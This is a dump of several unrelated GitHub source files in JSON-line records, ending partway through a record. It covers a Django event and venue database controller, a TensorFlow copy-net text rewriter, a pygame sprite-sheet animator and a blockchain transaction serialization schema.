dataset\n\n#np.set_printoptions(threshold=np.inf)\n\ndataset = data_preprocess(raw_data)\ndataset = dataset[dataset[:,1].argsort()]\n#print(dataset)\n#print (dataset.shape)\n#count the number of classes\nnumClasses = len(np.unique(dataset[:,-1]))\n#print(numClasses)\n#exit()\n#train, test = train_test_split(dataset, test_size=0.2)\n","repo_name":"afalak94/Radial-Basis-Function-Neural-Network","sub_path":"RBFN_bash/Cancer_preprocess.py","file_name":"Cancer_preprocess.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19972879585","text":"from event_handler.models import Event, Stage, StageStaff, StageParticipants, Venue\nfrom creator_handler.models import StageSettings\nfrom user_handler.models import DjangoUser, User\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom enum import Enum\n\nfrom event_handler.db_controller import get_user_by_django_user, get_stages_by_event, get_event_by_id\n\n\ndef get_participants_by_event(event: Event):\n stage = get_stages_by_event(event).first()\n return StageParticipants.objects.filter(stage=stage)\n\n\ndef get_staff_by_event(event: Event):\n stage = get_stages_by_event(event).first()\n return [] if stage.users is None else stage.users\n\n\nclass SettingsSet(Enum):\n EDIT_VENUES = 1\n ACCEPT_APPLICATIONS = 2\n MANAGE_MAILING_LIST = 3\n\n\ndef get_venues_by_event(event_id: int):\n return Venue.objects.filter(parental_event_id=event_id)\n\n\ndef get_venue_by_id(venue_id: int):\n return Venue.objects.get(id=venue_id)\n\n\ndef get_venue_by_id_dict(venue_id: int):\n try:\n venue = get_venue_by_id(venue_id)\n except ObjectDoesNotExist:\n venue = {}\n except Exception as e:\n print(e)\n venue = {}\n return venue\n\n\ndef user_have_access(django_user: DjangoUser, event_id: int, setting=-1) -> bool:\n user = get_user_by_django_user(django_user)\n try:\n stage = get_stages_by_event(get_event_by_id(event_id)).first()\n staff = StageStaff.objects.get(user=user, stage=stage)\n setting_rule = 0\n if setting == SettingsSet.EDIT_VENUES:\n setting_rule = stage.settings.who_can_edit_venues\n elif setting == SettingsSet.ACCEPT_APPLICATIONS:\n setting_rule = stage.settings.who_can_accept_applications\n elif setting == SettingsSet.MANAGE_MAILING_LIST:\n setting_rule = stage.settings.who_can_manage_mailing_list\n return staff.status == StageStaff.Status.ACCEPTED and staff.role >= setting_rule\n except ObjectDoesNotExist:\n return False\n\n\ndef create_venue(name: str, address: str, region: int, participants_maximum: int, contacts: str, event_id: int) -> None:\n try:\n Venue.objects.create(\n name=name,\n address=address,\n region=region,\n participants_maximum=participants_maximum,\n parental_event=get_event_by_id(event_id),\n contacts=contacts,\n )\n except Exception as e:\n print(e)\n\n\ndef edit_venue(name: str, address: str, region: int, participants_maximum: int, contacts: str, venue_id: int) -> None:\n try:\n venue = Venue.objects.filter(id=venue_id).update(\n name=name,\n address=address,\n region=region,\n participants_maximum=participants_maximum,\n contacts=contacts,\n )\n except Exception as e:\n print(e)\n\n\ndef is_venue_attached_to_event(event_id: int, venue_id: int) -> bool:\n try:\n venue = get_venue_by_id(venue_id)\n return venue.parental_event.id == event_id\n except ObjectDoesNotExist:\n return False\n\n\ndef register_on_event(event_id: int, venue_id: int, user: User):\n stage = get_stages_by_event(get_event_by_id(event_id)).first()\n venue = get_venue_by_id(venue_id)\n if not is_venue_attached_to_event(event_id, venue_id):\n raise ValueError\n\n participation = StageParticipants.objects.get_or_create(stage=stage, user=user)[0]\n participation.role = StageParticipants.Roles.PARTICIPANT\n participation.status = StageParticipants.Status.ACCEPTED\n participation.venue = venue\n participation.save()\n\n\ndef make_record_event(name, description):\n event = Event.objects.create(name=name, description=description)\n return event\n\n\ndef make_record_stage(name, event, preview, time_start, time_end, description):\n stage = Stage.objects.create(\n name=name,\n parent=event,\n preview=preview,\n time_start=time_start,\n time_end=time_end,\n description=description,\n settings=StageSettings.objects.create(),\n )\n return stage\n\n\ndef create_staff(user, stage, role, status=Stage.Status.WAITING):\n StageStaff.objects.create(user=user,\n stage=stage,\n role=role,\n status=status)\n\n\ndef reject_participant(user: User, event_id: int):\n try:\n stage = get_stages_by_event(get_event_by_id(event_id)).first()\n StageParticipants.objects.filter(user=user, stage=stage).update(status=StageParticipants.Status.REJECTED)\n return True\n except ObjectDoesNotExist:\n return False\n\n\ndef accept_participant(user: User, event_id: int):\n try:\n stage = get_stages_by_event(get_event_by_id(event_id)).first()\n StageParticipants.objects.filter(user=user, stage=stage).update(status=StageParticipants.Status.ACCEPTED)\n return True\n except ObjectDoesNotExist:\n return False\n\n\ndef ban_participant(user: User, event_id: int):\n try:\n stage = get_stages_by_event(get_event_by_id(event_id)).first()\n StageParticipants.objects.filter(user=user, stage=stage).update(status=StageParticipants.Status.BANNED)\n return True\n except ObjectDoesNotExist:\n return False\n\n\ndef get_event_partcipants(event_id: int):\n stage = get_stages_by_event(get_event_by_id(event_id)).first()\n return StageParticipants.objects.filter(stage=stage)\n","repo_name":"hsse-distributed-events-team/distributed-events","sub_path":"creator_handler/db_controller.py","file_name":"db_controller.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"36120820473","text":"\"\"\"\nTextontent Manipulation\n3-gated copy net.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport importlib\nimport os\n\nimport numpy as np\nimport tensorflow as tf\nimport texar as tx\nfrom tensorflow.contrib.seq2seq.python.ops.beam_search_decoder import tile_batch\nfrom texar.core import get_train_op\n\nfrom copy_net import CopyNetWrapper\nfrom utils_e2e_clean import (\n x_strs,\n x_fields,\n y_strs,\n get_scope_name_of_train_op,\n get_scope_name_of_summary_op,\n corpus_bleu,\n)\n\n\n# pylint: disable=invalid-name, no-member, too-many-locals, global-statement\n# pylint: disable=undefined-loop-variable, unused-variable, chained-comparison\n# pylint: disable=unexpected-keyword-arg, no-value-for-parameter,\n# pylint: disable=protected-access, unused-argument, global-variable-undefined\n# pylint: disable=attribute-defined-outside-init\n\n\nclass Config:\n copy_x = True\n copy_y_ = False\n attn_x = True\n attn_y_ = True\n expr_name = \"model/e2e_model/demo\"\n disabled_vocab_size = 0\n eps = 1e-10\n add_bleu_weight = False\n exact_cover_w = 2.5\n\n coverage = True\n restore_from = \"\"\n rec_w = 0.8\n\n dir_summary = os.path.join(expr_name, \"log\")\n dir_model = os.path.join(expr_name, \"ckpt\")\n dir_best = os.path.join(expr_name, \"ckpt-best\")\n ckpt_model = os.path.join(dir_model, \"model.ckpt\")\n ckpt_best = os.path.join(dir_best, \"model.ckpt\")\n\n copy_flag = copy_x or copy_y_\n attn_flag = attn_x or attn_y_\n\n config_model = importlib.import_module(\n \"examples.content_rewriter.model.config_model_clean\"\n )\n config_train = importlib.import_module(\n \"examples.content_rewriter.model.config_train\"\n )\n config_data = importlib.import_module(\n \"examples.content_rewriter.model.config_data_e2e_clean\"\n )\n\n @classmethod\n def set_path(cls, path: str):\n cls.expr_name = path\n cls.dir_summary = os.path.join(cls.expr_name, \"log\")\n cls.dir_model = os.path.join(cls.expr_name, \"ckpt\")\n cls.dir_best = os.path.join(cls.expr_name, \"ckpt-best\")\n cls.ckpt_model = os.path.join(cls.dir_model, \"model.ckpt\")\n cls.ckpt_best = os.path.join(cls.dir_best, \"model.ckpt\")\n\n\ndef get_optimistic_restore_variables(ckpt_path, graph=tf.get_default_graph()):\n reader = tf.train.NewCheckpointReader(ckpt_path)\n saved_shapes = reader.get_variable_to_shape_map()\n var_names = sorted(\n [\n (var.name, var.name.split(\":\")[0])\n for var in tf.global_variables()\n if var.name.split(\":\")[0] in saved_shapes\n ]\n )\n restore_vars = []\n for var_name, saved_var_name in var_names:\n var = graph.get_tensor_by_name(var_name)\n var_shape = var.get_shape().as_list()\n if var_shape == saved_shapes[saved_var_name]:\n restore_vars.append(var)\n return restore_vars\n\n\ndef get_optimistic_saver(ckpt_path, graph=tf.get_default_graph()):\n return tf.train.Saver(\n get_optimistic_restore_variables(ckpt_path, graph=graph)\n )\n\n\ndef build_model(data_batch, data, step):\n batch_size, num_steps = [\n tf.shape(data_batch[\"x_value_text_ids\"])[d] for d in range(2)\n ]\n vocab = data.vocab(\"y_aux\")\n\n id2str = \"<{}>\".format\n bos_str, eos_str = map(id2str, (vocab.bos_token_id, vocab.eos_token_id))\n\n def single_bleu(ref, hypo):\n ref = [id2str(u if u != vocab.unk_token_id else -1) for u in ref]\n hypo = [id2str(u) for u in hypo]\n\n ref = tx.utils.strip_special_tokens(\n \" \".join(ref), strip_bos=bos_str, strip_eos=eos_str\n )\n hypo = tx.utils.strip_special_tokens(\" \".join(hypo), strip_eos=eos_str)\n\n return 0.01 * tx.evals.sentence_bleu(references=[ref], hypothesis=hypo)\n\n def batch_bleu(refs, hypos):\n return np.array(\n [single_bleu(ref, hypo) for ref, hypo in zip(refs, hypos)],\n dtype=np.float32,\n )\n\n def lambda_anneal(step_stage):\n\n print(\"==========step_stage is {}\".format(step_stage))\n if step_stage <= 1:\n rec_weight = 1\n elif step_stage > 1 and step_stage < 2:\n rec_weight = Config.rec_w - step_stage * 0.1\n return np.array(rec_weight, dtype=tf.float32)\n\n # losses\n losses = {}\n\n # embedders\n embedders = {\n name: tx.modules.WordEmbedder(\n vocab_size=data.vocab(name).size, hparams=hparams\n )\n for name, hparams in Config.config_model.embedders.items()\n }\n\n # encoders\n y_encoder = tx.modules.BidirectionalRNNEncoder(\n hparams=Config.config_model.y_encoder\n )\n x_encoder = tx.modules.BidirectionalRNNEncoder(\n hparams=Config.config_model.x_encoder\n )\n\n def concat_encoder_outputs(outputs):\n return tf.concat(outputs, -1)\n\n def encode(ref_flag):\n y_str = y_strs[ref_flag]\n sent_ids = data_batch[\"{}_text_ids\".format(y_str)]\n sent_embeds = embedders[\"y_aux\"](sent_ids)\n sent_sequence_length = data_batch[\"{}_length\".format(y_str)]\n sent_enc_outputs, _ = y_encoder(\n sent_embeds, sequence_length=sent_sequence_length\n )\n sent_enc_outputs = concat_encoder_outputs(sent_enc_outputs)\n\n x_str = x_strs[ref_flag]\n sd_ids = {\n field: data_batch[\"{}_{}_text_ids\".format(x_str, field)][:, 1:-1]\n for field in x_fields\n }\n sd_embeds = tf.concat(\n [\n embedders[\"x_{}\".format(field)](sd_ids[field])\n for field in x_fields\n ],\n axis=-1,\n )\n sd_sequence_length = (\n data_batch[\"{}_{}_length\".format(x_str, x_fields[0])] - 2\n )\n sd_enc_outputs, _ = x_encoder(\n sd_embeds, sequence_length=sd_sequence_length\n )\n sd_enc_outputs = concat_encoder_outputs(sd_enc_outputs)\n\n return (\n sent_ids,\n sent_embeds,\n sent_enc_outputs,\n sent_sequence_length,\n sd_ids,\n sd_embeds,\n sd_enc_outputs,\n sd_sequence_length,\n )\n\n encode_results = [encode(ref_str) for ref_str in range(2)]\n (\n sent_ids,\n sent_embeds,\n sent_enc_outputs,\n sent_sequence_length,\n sd_ids,\n sd_embeds,\n sd_enc_outputs,\n sd_sequence_length,\n ) = zip(*encode_results)\n\n # get rnn cell\n rnn_cell = tx.core.layers.get_rnn_cell(Config.config_model.rnn_cell)\n\n def get_decoder(\n cell, y__ref_flag, x_ref_flag, tgt_ref_flag, beam_width=None\n ):\n output_layer_params = (\n {\"output_layer\": tf.identity}\n if Config.copy_flag\n else {\"vocab_size\": vocab.size}\n )\n\n if Config.attn_flag: # attention\n if Config.attn_x and Config.attn_y_:\n memory = tf.concat(\n [sent_enc_outputs[y__ref_flag], sd_enc_outputs[x_ref_flag]],\n axis=1,\n )\n memory_sequence_length = None\n elif Config.attn_y_:\n memory = sent_enc_outputs[y__ref_flag]\n memory_sequence_length = sent_sequence_length[y__ref_flag]\n elif Config.attn_x:\n memory = sd_enc_outputs[x_ref_flag]\n memory_sequence_length = sd_sequence_length[x_ref_flag]\n else:\n raise Exception(\n \"Must specify either y__ref_flag or x_ref_flag.\"\n )\n attention_decoder = tx.modules.AttentionRNNDecoder(\n cell=cell,\n memory=memory,\n memory_sequence_length=memory_sequence_length,\n hparams=Config.config_model.attention_decoder,\n **output_layer_params\n )\n if not Config.copy_flag:\n return attention_decoder\n cell = (\n attention_decoder.cell\n if beam_width is None\n else attention_decoder._get_beam_search_cell(beam_width)\n )\n\n if Config.copy_flag: # copynet\n kwargs = {\n \"y__ids\": sent_ids[y__ref_flag][:, 1:],\n \"y__states\": sent_enc_outputs[y__ref_flag][:, 1:],\n \"y__lengths\": sent_sequence_length[y__ref_flag] - 1,\n \"x_ids\": sd_ids[x_ref_flag][\"value\"],\n \"x_states\": sd_enc_outputs[x_ref_flag],\n \"x_lengths\": sd_sequence_length[x_ref_flag],\n }\n\n if tgt_ref_flag is not None:\n kwargs.update(\n {\n \"input_ids\": data_batch[\n \"{}_text_ids\".format(y_strs[tgt_ref_flag])\n ][:, :-1]\n }\n )\n\n memory_prefixes = []\n\n if Config.copy_y_:\n memory_prefixes.append(\"y_\")\n\n if Config.copy_x:\n memory_prefixes.append(\"x\")\n\n if beam_width is not None:\n kwargs = {\n name: tile_batch(value, beam_width)\n for name, value in kwargs.items()\n }\n\n def get_get_copy_scores(memory_ids_states_lengths, output_size):\n memory_copy_states = [\n tf.layers.dense(\n memory_states,\n units=output_size,\n activation=None,\n use_bias=False,\n )\n for _, memory_states, _ in memory_ids_states_lengths\n ]\n\n def get_copy_scores(query, coverities=None):\n ret = []\n\n if Config.copy_y_:\n memory = memory_copy_states[len(ret)]\n if coverities is not None:\n memory = memory + tf.layers.dense(\n coverities[len(ret)],\n units=output_size,\n activation=None,\n use_bias=False,\n )\n memory = tf.nn.tanh(memory)\n ret_y_ = tf.einsum(\"bim,bm->bi\", memory, query)\n ret.append(ret_y_)\n\n if Config.copy_x:\n memory = memory_copy_states[len(ret)]\n if coverities is not None:\n memory = memory + tf.layers.dense(\n coverities[len(ret)],\n units=output_size,\n activation=None,\n use_bias=False,\n )\n memory = tf.nn.tanh(memory)\n ret_x = tf.einsum(\"bim,bm->bi\", memory, query)\n ret.append(ret_x)\n\n return ret\n\n return get_copy_scores\n\n covrity_dim = (\n Config.config_model.coverage_state_dim\n if Config.coverage\n else None\n )\n coverity_rnn_cell_hparams = (\n Config.config_model.coverage_rnn_cell\n if Config.coverage\n else None\n )\n cell = CopyNetWrapper(\n cell=cell,\n vocab_size=vocab.size,\n memory_ids_states_lengths=[\n tuple(\n kwargs[\"{}_{}\".format(prefix, s)]\n for s in (\"ids\", \"states\", \"lengths\")\n )\n for prefix in memory_prefixes\n ],\n input_ids=kwargs[\"input_ids\"]\n if tgt_ref_flag is not None\n else None,\n get_get_copy_scores=get_get_copy_scores,\n coverity_dim=covrity_dim,\n coverity_rnn_cell_hparams=coverity_rnn_cell_hparams,\n disabled_vocab_size=Config.disabled_vocab_size,\n eps=Config.eps,\n )\n\n decoder = tx.modules.BasicRNNDecoder(\n cell=cell,\n hparams=Config.config_model.decoder,\n **output_layer_params\n )\n return decoder\n\n def get_decoder_and_outputs(\n cell, y__ref_flag, x_ref_flag, tgt_ref_flag, params, beam_width=None\n ):\n decoder = get_decoder(\n cell, y__ref_flag, x_ref_flag, tgt_ref_flag, beam_width=beam_width\n )\n if beam_width is None:\n ret = decoder(**params)\n else:\n ret = tx.modules.beam_search_decode(\n decoder_or_cell=decoder, beam_width=beam_width, **params\n )\n return (decoder,) + ret\n\n get_decoder_and_outputs = tf.make_template(\n \"get_decoder_and_outputs\", get_decoder_and_outputs\n )\n\n def teacher_forcing(cell, y__ref_flag, x_ref_flag, loss_name):\n tgt_ref_flag = x_ref_flag\n tgt_str = y_strs[tgt_ref_flag]\n sequence_length = data_batch[\"{}_length\".format(tgt_str)] - 1\n decoder, tf_outputs, final_state, _ = get_decoder_and_outputs(\n cell,\n y__ref_flag,\n x_ref_flag,\n tgt_ref_flag,\n {\n \"decoding_strategy\": \"train_greedy\",\n \"inputs\": sent_embeds[tgt_ref_flag],\n \"sequence_length\": sequence_length,\n },\n )\n\n tgt_sent_ids = data_batch[\"{}_text_ids\".format(tgt_str)][:, 1:]\n loss = tx.losses.sequence_sparse_softmax_cross_entropy(\n labels=tgt_sent_ids,\n logits=tf_outputs.logits,\n sequence_length=sequence_length,\n average_across_batch=False,\n )\n if (\n Config.add_bleu_weight\n and y__ref_flag is not None\n and tgt_ref_flag is not None\n and y__ref_flag != tgt_ref_flag\n ):\n w = tf.py_func(\n batch_bleu,\n [sent_ids[y__ref_flag], tgt_sent_ids],\n tf.float32,\n stateful=False,\n name=\"W_BLEU\",\n )\n w.set_shape(loss.get_shape())\n loss = w * loss\n loss = tf.reduce_mean(loss, 0)\n\n if Config.copy_flag and Config.exact_cover_w != 0:\n sum_copy_probs = list(\n map(\n lambda t: tf.cast(t, tf.float32), final_state.sum_copy_probs\n )\n )\n memory_lengths = [\n lengths\n for _, _, lengths in decoder.cell.memory_ids_states_lengths\n ]\n exact_coverage_losses = [\n tf.reduce_mean(\n tf.reduce_sum(\n tx.utils.mask_sequences(\n tf.square(sum_copy_prob - 1.0), memory_length\n ),\n 1,\n )\n )\n for sum_copy_prob, memory_length in zip(\n sum_copy_probs, memory_lengths\n )\n ]\n print_xe_loss_op = tf.print(loss_name, \"xe loss:\", loss)\n with tf.control_dependencies([print_xe_loss_op]):\n for i, exact_coverage_loss in enumerate(exact_coverage_losses):\n print_op = tf.print(\n loss_name,\n \"exact coverage loss {:d}:\".format(i),\n exact_coverage_loss,\n )\n with tf.control_dependencies([print_op]):\n loss += Config.exact_cover_w * exact_coverage_loss\n\n losses[loss_name] = loss\n\n return decoder, tf_outputs, loss\n\n def beam_searching(cell, y__ref_flag, x_ref_flag, beam_width):\n start_tokens = (\n tf.ones_like(data_batch[\"y_aux_length\"]) * vocab.bos_token_id\n )\n end_token = vocab.eos_token_id\n\n decoder, bs_outputs, _, _ = get_decoder_and_outputs(\n cell,\n y__ref_flag,\n x_ref_flag,\n None,\n {\n \"embedding\": embedders[\"y_aux\"],\n \"start_tokens\": start_tokens,\n \"end_token\": end_token,\n \"max_decoding_length\": Config.config_train.infer_max_decoding_length,\n },\n beam_width=Config.config_train.infer_beam_width,\n )\n\n return decoder, bs_outputs\n\n decoder, tf_outputs, loss = teacher_forcing(rnn_cell, 1, 0, \"MLE\")\n rec_decoder, _, rec_loss = teacher_forcing(rnn_cell, 1, 1, \"REC\")\n rec_weight = Config.rec_w\n\n step_stage = tf.cast(step, tf.float32) / tf.constant(800.0)\n rec_weight = tf.case(\n [\n (\n tf.less_equal(step_stage, tf.constant(1.0)),\n lambda: tf.constant(1.0),\n ),\n (tf.greater(step_stage, tf.constant(2.0)), lambda: Config.rec_w),\n ],\n default=lambda: tf.constant(1.0)\n - (step_stage - 1) * (1 - Config.rec_w),\n )\n joint_loss = (1 - rec_weight) * loss + rec_weight * rec_loss\n losses[\"joint\"] = joint_loss\n\n tiled_decoder, bs_outputs = beam_searching(\n rnn_cell, 1, 0, Config.config_train.infer_beam_width\n )\n\n train_ops = {\n name: get_train_op(\n losses[name], hparams=Config.config_train.train[name]\n )\n for name in Config.config_train.train\n }\n\n return train_ops, bs_outputs\n\n\nclass Rewriter:\n def __init__(self):\n self.sess = tf.Session()\n # data batch\n self.datasets = {\n mode: tx.data.MultiAlignedData(hparams)\n for mode, hparams in Config.config_data.datas.items()\n }\n self.data_iterator = tx.data.FeedableDataIterator(self.datasets)\n self.data_batch = self.data_iterator.get_next()\n\n self.global_step = tf.train.get_or_create_global_step()\n\n self.train_ops, self.bs_outputs = build_model(\n self.data_batch, self.datasets[\"train\"], self.global_step\n )\n\n self.summary_ops = {\n name: tf.summary.merge(\n tf.get_collection(\n tf.GraphKeys.SUMMARIES,\n scope=get_scope_name_of_train_op(name),\n ),\n name=get_scope_name_of_summary_op(name),\n )\n for name in self.train_ops.keys()\n }\n\n self.saver = tf.train.Saver(max_to_keep=None)\n\n # global best_ever_val_bleu\n self.best_ever_val_bleu = 0.0\n\n def save_to(self, directory, step):\n print(\"saving to {} ...\".format(directory))\n\n saved_path = self.saver.save(self.sess, directory, global_step=step)\n\n print(\"saved to {}\".format(saved_path))\n\n def restore_from_path(self, ckpt_path):\n print(\"restoring from {} ...\".format(ckpt_path))\n\n try:\n self.saver.restore(self.sess, ckpt_path)\n except tf.errors.NotFoundError:\n print(\"Some variables are missing. Try optimistically restoring.\")\n (get_optimistic_saver(ckpt_path)).restore(self.sess, ckpt_path)\n\n print(\"done.\")\n\n def restore_from(self, directory):\n if os.path.exists(directory):\n ckpt_path = tf.train.latest_checkpoint(directory)\n self.restore_from_path(ckpt_path)\n\n else:\n print(\"cannot find checkpoint directory {}\".format(directory))\n\n def train_epoch(self, sess, summary_writer, mode, train_op, summary_op):\n print(\"in _train_epoch\")\n\n self.data_iterator.restart_dataset(sess, mode)\n\n feed_dict = {\n tx.global_mode(): tf.estimator.ModeKeys.TRAIN,\n self.data_iterator.handle: self.data_iterator.get_handle(\n sess, mode\n ),\n }\n\n while True:\n try:\n loss, summary = sess.run((train_op, summary_op), feed_dict)\n\n step = tf.train.global_step(sess, self.global_step)\n\n print(\"step {:d}: loss = {:.6f}\".format(step, loss))\n\n summary_writer.add_summary(summary, step)\n\n # if step % config_train.steps_per_eval == 0:\n # _eval_epoch(sess, summary_writer, 'val')\n\n except tf.errors.OutOfRangeError:\n break\n\n print(\"end _train_epoch\")\n\n def eval_epoch(self, mode):\n\n # As discussed in this thread, to use this model in an multi-thread\n # environment (such as a web server). We need to explicitly use the\n # default session:\n # https://github.com/keras-team/keras/issues/2397#issuecomment-254919212\n with self.sess.graph.as_default():\n print(\"in _eval_epoch with mode {}\".format(mode))\n\n self.data_iterator.restart_dataset(self.sess, mode)\n\n feed_dict = {\n self.data_iterator.handle: self.data_iterator.get_handle(\n self.sess, mode\n ),\n tx.global_mode(): tf.estimator.ModeKeys.EVAL,\n }\n\n step = tf.train.global_step(self.sess, self.global_step)\n\n ref_hypo_pairs = []\n fetches = [\n [self.data_batch[\"y_aux_text\"], self.data_batch[\"y_ref_text\"]],\n [\n self.data_batch[\"x_value_text\"],\n self.data_batch[\"x_ref_value_text\"],\n ],\n self.bs_outputs.predicted_ids,\n ]\n\n if not os.path.exists(Config.dir_model):\n os.makedirs(Config.dir_model)\n\n hypo_file_name = os.path.join(\n Config.dir_model, \"hypos.step{}.{}.txt\".format(step, mode)\n )\n hypo_file = open(hypo_file_name, \"w\")\n\n cnt = 0\n while True:\n try:\n target_texts, entry_texts, output_ids = self.sess.run(\n fetches, feed_dict\n )\n target_texts = [\n tx.utils.strip_special_tokens(\n texts[:, 1:].tolist(), is_token_list=True\n )\n for texts in target_texts\n ]\n entry_texts = [\n tx.utils.strip_special_tokens(\n texts[:, 1:].tolist(), is_token_list=True\n )\n for texts in entry_texts\n ]\n\n output_ids = output_ids[:, :, 0]\n output_texts = tx.utils.map_ids_to_strs(\n ids=output_ids.tolist(),\n vocab=self.datasets[mode].vocab(\"y_aux\"),\n join=False,\n )\n\n target_texts = list(zip(*target_texts))\n entry_texts = list(zip(*entry_texts))\n for ref, hypo in zip(target_texts, output_texts):\n if cnt < 10:\n print(\"cnt = {}\".format(cnt))\n for i, s in enumerate(ref):\n print(\"ref{}: {}\".format(i, \" \".join(s)))\n print(\"hypo: {}\".format(\" \".join(hypo)))\n return \"{}\".format(\" \".join(hypo))\n print(\" \".join(hypo), file=hypo_file)\n cnt += 1\n print(\"processed {} samples\".format(cnt))\n\n ref_hypo_pairs.extend(\n zip(target_texts, entry_texts, output_texts)\n )\n\n except tf.errors.OutOfRangeError:\n break\n\n hypo_file.close()\n\n refs, entrys, hypos = zip(*ref_hypo_pairs)\n\n bleus = []\n get_bleu_name = \"{}_BLEU\".format\n for i in range(1, 2):\n refs_ = list(map(lambda ref: ref[i : i + 1], refs))\n ents_ = list(map(lambda ent: ent[i : i + 1], entrys))\n entrys = list(zip(*entrys))\n bleu = corpus_bleu(refs_, hypos)\n bleus.append(bleu)\n\n summary = tf.Summary()\n for i, bleu in enumerate(bleus):\n summary.value.add(\n tag=\"{}/{}\".format(mode, get_bleu_name(i)),\n simple_value=bleu,\n )\n\n self.summary_writer.add_summary(summary, step)\n self.summary_writer.flush()\n\n bleu = bleus[0]\n if mode == \"val\":\n if bleu > self.best_ever_val_bleu:\n self.best_ever_val_bleu = bleu\n print(\"updated best val bleu: {}\".format(bleu))\n\n self.save_to(Config.ckpt_best, step)\n\n print(\"end _eval_epoch\")\n return\n\n def load_model(self):\n\n # As discussed in this thread, to use this model in an multi-thread\n # environment (such as a web server). We need to explicitly use the\n # default session:\n # https://github.com/keras-team/keras/issues/2397#issuecomment-254919212\n with self.sess.graph.as_default():\n self.sess.run(tf.global_variables_initializer())\n self.sess.run(tf.local_variables_initializer())\n self.sess.run(tf.tables_initializer())\n # self.sess.run(self.data_iterator)\n\n print(\"loading model \", Config.restore_from, Config.dir_model)\n\n if Config.restore_from:\n self.restore_from_path(Config.restore_from)\n else:\n self.restore_from(Config.dir_model)\n\n self.summary_writer = tf.summary.FileWriter(\n Config.dir_summary, self.sess.graph, flush_secs=30\n )\n\n epoch = 0\n while epoch < Config.config_train.max_epochs:\n name = \"joint\"\n train_op = self.train_ops[name]\n summary_op = self.summary_ops[name]\n\n step = tf.train.global_step(self.sess, self.global_step)\n\n self.train_epoch(\n self.sess,\n self.summary_writer,\n \"train\",\n train_op,\n summary_op,\n )\n\n epoch += 1\n\n step = tf.train.global_step(self.sess, self.global_step)\n self.save_to(Config.ckpt_model, step)\n","repo_name":"asyml/forte","sub_path":"examples/content_rewriter/model/manip.py","file_name":"manip.py","file_ext":"py","file_size_in_byte":26413,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"36"} +{"seq_id":"685676592","text":"import pygame\n\nclass spritesheet(object):\n def __init__(self, filename, scale_x, scale_y, IsFlip):\n self.sheet = pygame.image.load(filename)\n self.sheet = pygame.transform.scale(self.sheet, (int(self.sheet.get_width() * scale_x), int(self.sheet.get_height() * scale_y)))\n self.sheet = pygame.transform.flip(self.sheet, IsFlip, False)\n\n # Load a specific image from a specific rectangle\n def image_at(self, rectangle, colorkey = None):\n # \"Loads image from x,y,x+offset,y+offset\"\n rect = pygame.Rect(rectangle)\n image = pygame.Surface(rect.size, pygame.SRCALPHA)\n image.blit(self.sheet, (0, 0), rect)\n return image\n\n # Load a whole bunch of images and return them as a list\n def images_at(self, rects, colorkey = None):\n # \"Loads multiple images, supply a list of coordinates\" \n return [self.image_at(rect, colorkey) for rect in rects]\n \n # Load a whole strip of images\n def load_strip(self, rect, image_count, colorkey = None):\n # \"Loads a strip of images and returns them as a list\"\n tups = [(rect[0]+rect[2]*x, rect[1], rect[2], rect[3])\n for x in range(image_count)]\n return self.images_at(tups, colorkey)\n\nclass SpriteStripAnim(object):\n def __init__(self, filename, rect, count, colorkey=None, loop=False, frames=1, scale_x = 1, scale_y = 1, IsFlip = False):\n self.filename = filename\n ss = spritesheet(filename, scale_x, scale_y, IsFlip)\n self.images = ss.load_strip(rect, count, colorkey)\n self.i = 0\n self.loop = loop\n self.frames = frames\n self.f = frames\n self.count = count\n def iter(self):\n self.i = 0\n self.f = self.frames\n return self\n def next(self):\n if self.i >= len(self.images):\n if not self.loop:\n raise StopIteration\n else:\n self.i = 0\n image = self.images[self.i]\n self.f -= 1\n if self.f == 0:\n self.i += 1\n self.f = self.frames\n return image\n def __add__(self, ss):\n self.images.extend(ss.images)\n return self\n def IsEnd(self):\n if self.i == self.count-1 :\n return True\n return False","repo_name":"Tuesberry/PythonGame","sub_path":"4. ShootDefenseGame/SpriteStripAnim.py","file_name":"SpriteStripAnim.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"24526707963","text":"import hashlib\nfrom typing import Annotated\n\nfrom . import signer\nfrom .serializer import BinarySerializer\n\n\nclass FunctionCallPermission:\n allowance: int | None\n receiver_id: str\n method_names: list[str]\n\n\nclass FullAccessPermission:\n pass\n\n\nclass AccessKeyPermission:\n enum: FunctionCallPermission | FullAccessPermission\n\n\nclass AccessKey:\n nonce: int\n permission: AccessKeyPermission\n\n\nclass PublicKey:\n key_type: int\n data: Annotated[bytes, 32]\n\n\nclass Signature:\n key_type: int\n data: Annotated[bytes, 64]\n\n\nclass CreateAccount:\n pass\n\n\nclass DeployContract:\n code: bytes\n\n\nclass FunctionCall:\n method_name: str\n args: bytes\n gas: int\n deposit: int\n\n\nclass Transfer:\n deposit: int\n\n\nclass Stake:\n stake: int\n public_key: PublicKey\n\n\nclass AddKey:\n access_key: AccessKey\n public_key: PublicKey\n\n\nclass DeleteKey:\n public_key: PublicKey\n\n\nclass DeleteAccount:\n beneficiary_id: str\n\n\nclass Action:\n enum: CreateAccount | DeployContract | FunctionCall | Transfer | Stake | AddKey | DeleteKey | DeleteAccount\n\n\nclass Transaction:\n signer_id: str\n public_key: PublicKey\n nonce: int\n receiver_id: str\n block_hash: Annotated[bytes, 32]\n actions: list[Action]\n\n\nclass SignedTransaction:\n transaction: Transaction\n signature: Signature\n\n\ntx_schema = {\n Signature: {\n 'kind': 'struct',\n 'fields': [\n ['key_type', 'u8'],\n ['data', [64]],\n ],\n },\n SignedTransaction: {\n 'kind': 'struct',\n 'fields': [\n ['transaction', Transaction],\n ['signature', Signature],\n ],\n },\n Transaction: {\n 'kind': 'struct',\n 'fields': [\n ['signer_id', 'string'],\n ['public_key', PublicKey],\n ['nonce', 'u64'],\n ['receiver_id', 'string'],\n ['block_hash', [32]],\n ['actions', [Action]],\n ],\n },\n PublicKey: {\n 'kind': 'struct',\n 'fields': [\n ['key_type', 'u8'],\n ['data', [32]],\n ],\n },\n AccessKey: {\n 'kind': 'struct',\n 